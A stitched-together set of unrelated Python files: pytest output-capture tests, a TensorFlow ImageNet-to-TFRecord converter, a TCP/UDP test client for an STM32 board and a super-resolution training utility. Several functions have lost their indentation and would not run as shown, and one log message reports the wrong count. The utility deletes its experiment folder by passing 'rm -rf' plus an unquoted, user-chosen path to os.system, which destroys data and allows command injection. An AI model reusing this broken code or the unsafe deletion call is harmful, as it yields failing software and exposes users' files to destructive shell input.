        """.format(
            capture_fixture
        )
    )
    result = pytester.runpytest_subprocess("--log-cli-level=INFO")
    assert result.ret == 0
def test_typeerror_encodedfile_write(pytester: Pytester) -> None:
    """It should behave the same with and without output capturing (#4861)."""
    p = pytester.makepyfile(
        """
        def test_fails():
            import sys
            sys.stdout.write(b"foo")
        """
    )
    result_without_capture = pytester.runpytest("-s", str(p))
    result_with_capture = pytester.runpytest(str(p))

    assert result_with_capture.ret == result_without_capture.ret
    out = result_with_capture.stdout.str()
    # message wording differs between Python versions
    assert ("TypeError: write() argument must be str, not bytes" in out) or (
        "TypeError: unicode argument expected, got 'bytes'" in out
    )
def test_stderr_write_returns_len(capsys: CaptureFixture[str]) -> None:
    """Writing to captured stderr must report the number of characters written."""
    written = sys.stderr.write("Foo")
    assert written == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
    """EncodedFile.writelines accepts only str lines and returns None."""
    ef = capture.EncodedFile(tmpfile, encoding="utf-8")
    # Byte strings are rejected: the wrapper encodes text into the binary file.
    with pytest.raises(TypeError):
        ef.writelines([b"line1", b"line2"])  # type: ignore[list-item]
    assert ef.writelines(["line3", "line4"]) is None  # type: ignore[func-returns-value]
    ef.flush()
    tmpfile.seek(0)
    # Lines are written verbatim, without added separators.
    assert tmpfile.read() == b"line3line4"
    tmpfile.close()
    # Reading through the wrapper after the underlying file is closed fails.
    with pytest.raises(ValueError):
        ef.read()
def test__get_multicapture() -> None:
    """The 'no' method yields a MultiCapture; an unknown method name raises."""
    capture_obj = _get_multicapture("no")
    assert isinstance(capture_obj, MultiCapture)
    with pytest.raises(ValueError, match=r"^unknown capturing method: 'unknown'"):
        _get_multicapture("unknown")
def test_logging_while_collecting(pytester: Pytester) -> None:
    """Issue #6240: Calls to logging.xxx() during collection causes all logging calls to be duplicated to stderr"""
    p = pytester.makepyfile(
        """\
        import logging
        logging.warning("during collection")
        def test_logging():
            logging.warning("during call")
            assert False
        """
    )
    result = pytester.runpytest_subprocess(p)
    assert result.ret == ExitCode.TESTS_FAILED
    # The warning emitted during the test call must show up in the captured
    # log section of the failure report.
    result.stdout.fnmatch_lines(
        [
            "*test_*.py F*",
            "====* FAILURES *====",
            "____*____",
            "*--- Captured log call*",
            "WARNING * during call",
            "*1 failed*",
        ]
    )
    # It must NOT be duplicated to stderr, and collection-time logging must
    # not leak into the test's report at all.
    result.stdout.no_fnmatch_line("*Captured stderr call*")
    result.stdout.no_fnmatch_line("*during collection*")
|
build_imagenet_data.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFRecord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
tf.compat.v1.app.flags.DEFINE_string('raw_directory', None,
'Raw data directory')
tf.compat.v1.app.flags.DEFINE_string('output_directory', None,
'Output data directory')
tf.compat.v1.app.flags.DEFINE_integer('shards', 1,
'Number of shards in TFRecord files.')
tf.compat.v1.app.flags.DEFINE_string('subset', 'validation',
'Subset of imagenet, can be validation/train')
tf.compat.v1.app.flags.DEFINE_integer('num_threads', 1,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.compat.v1.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.compat.v1.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
FLAGS = tf.compat.v1.app.flags.FLAGS
def _int64_feature(value):
    """Wrap an int (or list of ints) as an int64 Feature for an Example proto."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def _float_feature(value):
    """Wrap a float (or list of floats) as a float Feature for an Example proto."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(float_list=tf.train.FloatList(value=values))
def _bytes_feature(value):
    """Wrap a single bytes value as a bytes Feature for an Example proto."""
    bytes_list = tf.train.BytesList(value=[value])
    return tf.train.Feature(bytes_list=bytes_list)
def _convert_to_example(filename, image_buffer, label, synset, human,
                        height, width):
    """Build an Example proto for an example.
    Args:
        filename: string, path to an image file, e.g., '/path/to/example.JPG'
        image_buffer: string, JPEG encoding of RGB image
        label: integer, identifier for the ground truth for the network
        synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
        human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
        height: integer, image height in pixels
        width: integer, image width in pixels
    Returns:
        Example proto
    """
    # Constant metadata: images are always stored as 3-channel RGB JPEG.
    colorspace = b'RGB'
    channels = 3
    image_format = b'JPEG'
    example = tf.train.Example(features=tf.train.Features(feature={
        'image/height': _int64_feature(height),
        'image/width': _int64_feature(width),
        'image/colorspace': _bytes_feature(colorspace),
        'image/channels': _int64_feature(channels),
        'image/class/label': _int64_feature(label),
        # str fields must be encoded to bytes before going into a BytesList.
        'image/class/synset': _bytes_feature(bytes(synset, 'utf-8')),
        'image/class/text': _bytes_feature(bytes(human, 'utf-8')),
        'image/format': _bytes_feature(image_format),
        'image/filename': _bytes_feature(bytes(os.path.basename(filename), 'utf-8')),
        'image/encoded': _bytes_feature(image_buffer)}))
    return example
class ImageCoder(object):
    """Helper class that provides TensorFlow image coding utilities."""

    def __init__(self):
        # Create a single Session to run all image coding calls.
        self._sess = tf.compat.v1.Session()
        # Initializes function that converts PNG to JPEG data.
        self._png_data = tf.compat.v1.placeholder(dtype=tf.string)
        image = tf.image.decode_png(self._png_data, channels=3)
        self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
        # Initializes function that converts CMYK JPEG data to RGB JPEG data.
        # channels=0 lets the decoder use the channel count stored in the file.
        self._cmyk_data = tf.compat.v1.placeholder(dtype=tf.string)
        image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
        self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
        # Initializes function that decodes RGB JPEG data.
        self._decode_jpeg_data = tf.compat.v1.placeholder(dtype=tf.string)
        self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)

    def png_to_jpeg(self, image_data):
        # Re-encode a PNG byte string as an RGB JPEG byte string.
        return self._sess.run(self._png_to_jpeg,
                              feed_dict={self._png_data: image_data})

    def cmyk_to_rgb(self, image_data):
        # Re-encode a CMYK JPEG byte string as an RGB JPEG byte string.
        return self._sess.run(self._cmyk_to_rgb,
                              feed_dict={self._cmyk_data: image_data})

    def decode_jpeg(self, image_data):
        # Decode a JPEG byte string; result must be a rank-3, 3-channel array.
        image = self._sess.run(self._decode_jpeg,
                               feed_dict={self._decode_jpeg_data: image_data})
        assert len(image.shape) == 3
        assert image.shape[2] == 3
        return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
    """Process a single image file.
    Args:
        filename: string, path to an image file e.g., '/path/to/example.JPG'.
        coder: instance of ImageCoder to provide TensorFlow image coding utils.
    Returns:
        image_buffer: string, JPEG encoding of RGB image.
        height: integer, image height in pixels.
        width: integer, image width in pixels.
    """
    # Read the image file.
    image_data = tf.io.gfile.GFile(filename, 'rb').read()
    # Clean the dirty data.
    if _is_png(filename):
        # 1 image is a PNG.
        print('Converting PNG to JPEG for %s' % filename)
        image_data = coder.png_to_jpeg(image_data)
    elif _is_cmyk(filename):
        # 22 JPEG images are in CMYK colorspace.
        print('Converting CMYK to RGB for %s' % filename)
        image_data = coder.cmyk_to_rgb(image_data)
    # Decode the RGB JPEG (only to validate it and read its dimensions;
    # the encoded bytes are what gets stored).
    image = coder.decode_jpeg(image_data)
    # Check that image converted to RGB
    assert len(image.shape) == 3
    height = image.shape[0]
    width = image.shape[1]
    assert image.shape[2] == 3
    return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               synsets, labels, humans, num_shards):
    """Processes and saves list of images as TFRecord in 1 thread.
    Args:
        coder: instance of ImageCoder to provide TensorFlow image coding utils.
        thread_index: integer, unique batch to run index is within [0, len(ranges)).
        ranges: list of pairs of integers specifying ranges of each batches to
            analyze in parallel.
        name: string, unique identifier specifying the data set
        filenames: list of strings; each string is a path to an image file
        synsets: list of strings; each string is a unique WordNet ID
        labels: list of integer; each integer identifies the ground truth
        humans: list of strings; each string is a human-readable label
        num_shards: integer number of shards for this data set.
    """
    # Each thread produces N shards where N = int(num_shards / num_threads).
    # For instance, if num_shards = 128, and the num_threads = 2, then the first
    # thread would produce shards [0, 64).
    num_threads = len(ranges)
    assert not num_shards % num_threads
    num_shards_per_batch = int(num_shards / num_threads)
    # Evenly split this thread's file range into per-shard sub-ranges.
    shard_ranges = np.linspace(ranges[thread_index][0],
                               ranges[thread_index][1],
                               num_shards_per_batch + 1).astype(int)
    num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
    counter = 0
    for s in xrange(num_shards_per_batch):
        # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
        shard = thread_index * num_shards_per_batch + s
        output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
        output_file = os.path.join(FLAGS.output_directory, output_filename)
        writer = tf.io.TFRecordWriter(output_file)
        shard_counter = 0
        # Indices of the files that belong to this shard.
        files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
        for i in files_in_shard:
            filename = filenames[i]
            label = labels[i]
            synset = synsets[i]
            human = humans[i]
            image_buffer, height, width = _process_image(filename, coder)
            example = _convert_to_example(filename, image_buffer, label, synset, human, height, width)
            writer.write(example.SerializeToString())
            shard_counter += 1
            counter += 1
            if not counter % 1000:
                print('%s [thread %d]: Processed %d of %d images in thread batch.' %
                      (datetime.now(), thread_index, counter, num_files_in_thread))
                sys.stdout.flush()
        writer.close()
        print('%s [thread %d]: Wrote %d images to %s' %
              (datetime.now(), thread_index, shard_counter, output_file))
        sys.stdout.flush()
        shard_counter = 0
    print('%s [thread %d]: Wrote %d images to %d shards.' %
          (datetime.now(), thread_index, counter, num_files_in_thread))
    sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans, num_shards):
    """Process and save list of images as TFRecord of Example protos.
    Args:
        name: string, unique identifier specifying the data set
        filenames: list of strings; each string is a path to an image file
        synsets: list of strings; each string is a unique WordNet ID
        labels: list of integer; each integer identifies the ground truth
        humans: list of strings; each string is a human-readable label
        num_shards: integer number of shards for this data set.
    """
    assert len(filenames) == len(synsets)
    assert len(filenames) == len(labels)
    assert len(filenames) == len(humans)
    # Break all images into batches with a [ranges[i][0], ranges[i][1]].
    # Bug fix: np.int was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin int is the documented replacement.
    spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
    ranges = []
    for i in xrange(len(spacing) - 1):
        ranges.append([spacing[i], spacing[i + 1]])
    # Launch a thread for each batch.
    print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
    sys.stdout.flush()
    # Create a mechanism for monitoring when all threads are finished.
    coord = tf.train.Coordinator()
    # Create a generic TensorFlow-based utility for converting all image codings.
    coder = ImageCoder()
    # (The original initialized this list twice; once is enough.)
    threads = []
    for thread_index in xrange(len(ranges)):
        args = (coder, thread_index, ranges, name, filenames,
                synsets, labels, humans, num_shards)
        t = threading.Thread(target=_process_image_files_batch, args=args)
        t.start()
        threads.append(t)
    # Wait for all the threads to terminate.
    coord.join(threads)
    print('%s: Finished writing all %d images in data set.' %
          (datetime.now(), len(filenames)))
    sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
    """Build a list of all images files and labels in the data set.
    Args:
        data_dir: string, path to the root directory of images.
            Assumes that the ImageNet data set resides in JPEG files located in
            the following directory structure.
                data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
                data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
            where 'n01440764' is the unique synset label associated with these images.
        labels_file: string, path to the labels file.
            The list of valid labels are held in this file. Assumes that the file
            contains entries as such:
                n01440764
                n01443537
                n01484850
            where each line corresponds to a label expressed as a synset. We map
            each synset contained in the file to an integer (based on the alphabetical
            ordering) starting with the integer 1 corresponding to the synset
            contained in the first line.
            The reason we start the integer labels at 1 is to reserve label 0 as an
            unused background class.
    Returns:
        filenames: list of strings; each string is a path to an image file.
        synsets: list of strings; each string is a unique WordNet ID.
        labels: list of integer; each integer identifies the ground truth.
    """
    print('Determining list of input files and labels from %s.' % data_dir)
    challenge_synsets = [l.strip() for l in
                         tf.compat.v1.gfile.FastGFile(labels_file, 'r').readlines()]
    labels = []
    filenames = []
    synsets = []
    # Leave label index 0 empty as a background class.
    label_index = 1
    # Construct the list of JPEG files and labels.
    for synset in challenge_synsets:
        jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
        matching_files = tf.io.gfile.glob(jpeg_file_path)
        labels.extend([label_index] * len(matching_files))
        synsets.extend([synset] * len(matching_files))
        filenames.extend(matching_files)
        if not label_index % 100:
            print('Finished finding files in %d of %d classes.' % (
                label_index, len(challenge_synsets)))
        label_index += 1
    # Shuffle the ordering of all image files in order to guarantee
    # random ordering of the images with respect to label in the
    # saved TFRecord files. Make the randomization repeatable.
    # Bug fix: the original code shuffled a throwaway list
    # (random.shuffle(list(range(...)))), leaving shuffled_index in its
    # original order -- so the data set was never actually shuffled.
    # Shuffle the index list itself.
    shuffled_index = list(range(len(filenames)))
    random.seed(12345)
    random.shuffle(shuffled_index)
    filenames = [filenames[i] for i in shuffled_index]
    synsets = [synsets[i] for i in shuffled_index]
    labels = [labels[i] for i in shuffled_index]
    print('Found %d JPEG files across %d labels inside %s.' %
          (len(filenames), len(challenge_synsets), data_dir))
    return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _process_dataset(name, directory, num_shards, synset_to_human):
    """Process a complete data set and save it as a TFRecord.
    Args:
        name: string, unique identifier specifying the data set.
        directory: string, root path to the data set.
        num_shards: integer number of shards for this data set.
        synset_to_human: dict of synset to human labels, e.g.,
            'n02119022' --> 'red fox, Vulpes vulpes'
    """
    # Enumerate images/labels, map synsets to human-readable text, then
    # write everything out as sharded TFRecord files.
    filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
    humans = _find_human_readable_labels(synsets, synset_to_human)
    _process_image_files(name, filenames, synsets, labels,
                         humans, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
    """Build lookup for synset to human-readable label.
    Args:
        imagenet_metadata_file: string, path to file containing mapping from
            synset to human-readable label.
            Assumes each line of the file looks like:
                n02119247    black fox
                n02119359    silver fox
                n02119477    red fox, Vulpes fulva
            where each line corresponds to a unique mapping. Note that each line is
            formatted as <synset>\t<human readable label>.
    Returns:
        Dictionary of synset to human labels, such as:
            'n02119022' --> 'red fox, Vulpes vulpes'
    """
    lines = tf.compat.v1.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
    synset_to_human = {}
    for l in lines:
        if l:
            # Each non-empty line is '<synset>\t<human label>'.
            parts = l.strip().split('\t')
            assert len(parts) == 2
            synset = parts[0]
            human = parts[1]
            synset_to_human[synset] = human
    return synset_to_human
def main(unused_argv):
    """Entry point: build the synset lookup and convert the requested subset.

    Args:
        unused_argv: leftover command-line arguments from tf.app.run (ignored).
    """
    assert not FLAGS.shards % FLAGS.num_threads, (
        'Please make the FLAGS.num_threads commensurate with FLAGS.shards')
    print('Saving results to %s' % FLAGS.output_directory)
    # Build a map from synset to human-readable label.
    synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
    # Idiom fix: compare with None using 'is not', not '!='.
    if FLAGS.raw_directory is not None:
        _process_dataset(FLAGS.subset, FLAGS.raw_directory, FLAGS.shards,
                         synset_to_human)
if __name__ == '__main__':
tf.compat.v1.app.run()
|
main.py | #!/usr/bin/env python3
import threading
from socket import AF_INET, SOCK_DGRAM, SOCK_STREAM, socket, SHUT_WR
import config
from config import SERVER_ADDRESS, SERVER_PORT
from definitions import AnsiColors
from utility import print_protected
if config.TCPIP_PROT == config.Protocols.TCPIP_PROT_1_UDP:
CLIENT_SOCKET = socket(AF_INET, SOCK_DGRAM)
PROTOCOL_STRING = "UDP"
else:
CLIENT_SOCKET = socket(AF_INET, SOCK_STREAM)
PROTOCOL_STRING = "TCP"
BUFFER_SIZE = 1500
def main():
    """Start the sender thread (and, for UDP, a listener) and wait for both."""
    print(f"TCP/IP client for the STM32 lwIP RTEMS example")
    # Evaluate the protocol choice once instead of re-checking it four times.
    use_udp = config.TCPIP_PROT == config.Protocols.TCPIP_PROT_1_UDP
    sender = threading.Thread(target=sender_thread, args=(None,))
    listener = threading.Thread(target=udp_listener_thread, args=(None,)) if use_udp else None
    sender.start()
    if listener is not None:
        listener.start()
    sender.join()
    if listener is not None:
        listener.join()
    print(f"{AnsiColors.RESET}Finished")
def sender_thread(args: any):
    """Dispatch to the TCP or UDP sender based on the configured protocol."""
    from config import TCPIP_PROT
    from definitions import Protocols
    if TCPIP_PROT == Protocols.TCPIP_PROT_0_TCP:
        tcp_sender()
    elif TCPIP_PROT == Protocols.TCPIP_PROT_1_UDP:
        udp_sender()
def tcp_sender():
    """Connect to the server, send the test string, and read the echo back."""
    target_address = SERVER_ADDRESS, SERVER_PORT
    string = f"Hello, this is a {PROTOCOL_STRING} test!"
    data = string.encode(encoding='utf-8')
    print_protected(f"Test string to be sent: {string}")
    CLIENT_SOCKET.connect(target_address)
    # Bug fix: sendto() with an explicit address is invalid on a connected
    # SOCK_STREAM socket (raises OSError on some platforms, and the address
    # is ignored on others); use send() on the connected socket instead.
    bytes_sent = CLIENT_SOCKET.send(data)
    print_protected(f"{AnsiColors.CYAN}Client: Sent {bytes_sent} bytes to server")
    # Half-close the connection so the server sees EOF after our payload.
    CLIENT_SOCKET.shutdown(SHUT_WR)
    bytes_rcvd = CLIENT_SOCKET.recv(BUFFER_SIZE)
    print_protected(f"{AnsiColors.CYAN}Client: Received back {len(bytes_rcvd)} bytes: {bytes_rcvd}")
def udp_sender():
    """Send the test string to the server as a single UDP datagram."""
    destination = (SERVER_ADDRESS, SERVER_PORT)
    string = f"Hello, this is a {PROTOCOL_STRING} test!"
    payload = string.encode(encoding='utf-8')
    print_protected(f"Test string to be sent: {string}")
    sent = CLIENT_SOCKET.sendto(payload, destination)
    print_protected(f"{AnsiColors.CYAN}Sender: Sent {sent} bytes to server")
def udp_listener_thread(args: any):
    # Block until the server echoes a datagram back, then log its contents.
    reply, from_addr = CLIENT_SOCKET.recvfrom(BUFFER_SIZE)
    print_protected(f"{AnsiColors.CYAN}Client: Received back {len(reply)} bytes: {reply}")
if __name__ == "__main__":
main()
|
utility.py | import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
    """Simple stopwatch that can accumulate elapsed time across intervals."""

    def __init__(self):
        self.acc = 0
        self.tic()

    def tic(self):
        """Start (or restart) timing the current interval."""
        self.t0 = time.time()

    def toc(self, restart=False):
        """Return seconds elapsed since tic(); optionally restart the clock."""
        elapsed = time.time() - self.t0
        if restart:
            self.t0 = time.time()
        return elapsed

    def hold(self):
        """Add the current interval to the accumulator."""
        self.acc += self.toc()

    def release(self):
        """Return the accumulated time and clear the accumulator."""
        total = self.acc
        self.acc = 0
        return total

    def reset(self):
        """Clear the accumulator."""
        self.acc = 0
class checkpoint():
    """Experiment bookkeeping: directories, text/PSNR logs, plots, and
    background worker processes for saving result images."""

    def __init__(self, args):
        self.args = args
        self.ok = True
        # Running PSNR history; rows are appended per epoch via add_log().
        self.log = torch.Tensor()
        now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
        if not args.load:
            # Fresh run: name the experiment dir after args.save (or timestamp).
            if not args.save:
                args.save = now
            self.dir = os.path.join('..', 'experiment', args.save)
        else:
            # Resume: restore the PSNR history from the previous run if present.
            self.dir = os.path.join('..', 'experiment', args.load)
            if os.path.exists(self.dir):
                print(self.get_path('psnr_log.pt'))
                self.log = torch.load(self.get_path('psnr_log.pt'))
                print('Continue from epoch {}...'.format(len(self.log)))
            else:
                args.load = ''
        if args.reset:
            # Wipe the experiment directory and start over.
            os.system('rm -rf ' + self.dir)
            args.load = ''
        os.makedirs(self.dir, exist_ok=True)
        os.makedirs(self.get_path('model'), exist_ok=True)
        for d in args.data_test:
            os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
        # Append to an existing log file, otherwise start a fresh one.
        open_type = 'a' if os.path.exists(self.get_path('log.txt')) else 'w'
        self.log_file = open(self.get_path('log.txt'), open_type)
        with open(self.get_path('config.txt'), open_type) as f:
            f.write(now + '\n\n')
            for arg in vars(args):
                f.write('{}: {}\n'.format(arg, getattr(args, arg)))
            f.write('\n')
        # Number of background processes used to write result images.
        self.n_processes = 8

    def get_path(self, *subdir):
        """Join path components onto the experiment directory."""
        return os.path.join(self.dir, *subdir)

    def save(self, trainer, epoch, is_best=False):
        """Persist model, loss, optimizer state, and the PSNR log/plots."""
        trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
        trainer.loss.save(self.dir)
        trainer.loss.plot_loss(self.dir, epoch)
        self.plot_psnr(epoch)
        trainer.optimizer.save(self.dir)
        torch.save(self.log, self.get_path('psnr_log.pt'))

    def add_log(self, log):
        """Append a new row of PSNR values to the history."""
        self.log = torch.cat([self.log, log])

    def write_log(self, log, refresh=False):
        """Print a message and mirror it to log.txt; optionally reopen the file."""
        print(log)
        self.log_file.write(log + '\n')
        if refresh:
            # Close and reopen so the message is flushed to disk immediately.
            self.log_file.close()
            self.log_file = open(self.get_path('log.txt'), 'a')

    def done(self):
        """Close the log file at the end of the run."""
        self.log_file.close()

    def plot_psnr(self, epoch):
        """Plot PSNR-vs-epoch curves for every test set and scale."""
        axis = np.linspace(1, epoch, epoch)
        for idx_data, d in enumerate(self.args.data_test):
            label = 'SR on {}'.format(d)
            fig = plt.figure()
            plt.title(label)
            for idx_scale, scale in enumerate(self.args.scale):
                plt.plot(
                    axis,
                    self.log[:, idx_data, idx_scale].numpy(),
                    label='Scale {}'.format(scale)
                )
            plt.legend()
            plt.xlabel('Epochs')
            plt.ylabel('PSNR')
            plt.grid(True)
            plt.savefig(self.get_path('test_{}.pdf'.format(d)))
            plt.close(fig)

    def begin_background(self):
        """Start worker processes that write queued result images to disk."""
        self.queue = Queue()

        def bg_target(queue):
            # Drain the queue until a (None, None) sentinel arrives.
            while True:
                if not queue.empty():
                    filename, tensor = queue.get()
                    if filename is None: break
                    imageio.imwrite(filename, tensor.numpy())

        self.process = [
            Process(target=bg_target, args=(self.queue,)) \
            for _ in range(self.n_processes)
        ]
        for p in self.process: p.start()

    def end_background(self):
        """Send one stop sentinel per worker, drain the queue, and join."""
        for _ in range(self.n_processes): self.queue.put((None, None))
        while not self.queue.empty(): time.sleep(1)
        for p in self.process: p.join()

    def save_results(self, dataset, filename, save_list, scale):
        """Queue SR/LR/HR tensors to be written as PNG files by the workers."""
        if self.args.save_results:
            filename = self.get_path(
                'results-{}'.format(dataset.dataset.name),
                '{}_x{}_'.format(filename, scale)
            )
            postfix = ('SR', 'LR', 'HR')
            for v, p in zip(save_list, postfix):
                # Rescale from rgb_range to 0-255 bytes and convert CHW -> HWC.
                normalized = v[0].mul(255 / self.args.rgb_range)
                tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
                self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
    """Snap img (values in [0, rgb_range]) to the 256 representable
    intensity levels, returning a tensor in the same range."""
    levels = 255 / rgb_range
    quantized = img.mul(levels).clamp(0, 255).round()
    return quantized.div(levels)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
    """Compute PSNR (dB) between a super-resolved and a ground-truth image.

    Args:
        sr: tensor, super-resolved image (assumed NCHW -- TODO confirm with caller).
        hr: tensor, ground-truth image; a 1-element hr disables the metric.
        scale: int, upscaling factor; a border of `scale` (benchmark) or
            `scale + 6` pixels is shaved off before computing the MSE.
        rgb_range: number, maximum intensity value of the inputs.
        dataset: optional dataloader wrapper; benchmark datasets are
            evaluated on the luma (Y) channel only.

    Returns:
        PSNR in dB; 0 when hr is a placeholder; inf for identical images.
    """
    if hr.nelement() == 1: return 0
    diff = (sr - hr) / rgb_range
    if dataset and dataset.dataset.benchmark:
        shave = scale
        if diff.size(1) > 1:
            # Convert the RGB difference to the Y channel (BT.601 weights).
            gray_coeffs = [65.738, 129.057, 25.064]
            convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
            diff = diff.mul(convert).sum(dim=1)
    else:
        shave = scale + 6
    valid = diff[..., shave:-shave, shave:-shave]
    mse = valid.pow(2).mean()
    # Bug fix: identical images give mse == 0 and math.log10(0) raised a
    # ValueError; report infinite PSNR instead.
    if mse == 0:
        return float('inf')
    return -10 * math.log10(mse)
def make_optimizer(args, target):
    '''
    make optimizer and scheduler together

    Builds a torch optimizer (SGD / ADAM / RMSprop, selected by args.optimizer)
    over the trainable parameters of `target`, and attaches a MultiStepLR
    scheduler driven by args.decay (milestones, '-'-separated) and args.gamma.
    Returns a CustomOptimizer exposing save/load/schedule helpers.
    '''
    # optimizer
    trainable = filter(lambda x: x.requires_grad, target.parameters())
    kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
    if args.optimizer == 'SGD':
        optimizer_class = optim.SGD
        kwargs_optimizer['momentum'] = args.momentum
    elif args.optimizer == 'ADAM':
        optimizer_class = optim.Adam
        kwargs_optimizer['betas'] = args.betas
        kwargs_optimizer['eps'] = args.epsilon
    elif args.optimizer == 'RMSprop':
        optimizer_class = optim.RMSprop
        kwargs_optimizer['eps'] = args.epsilon
    # scheduler
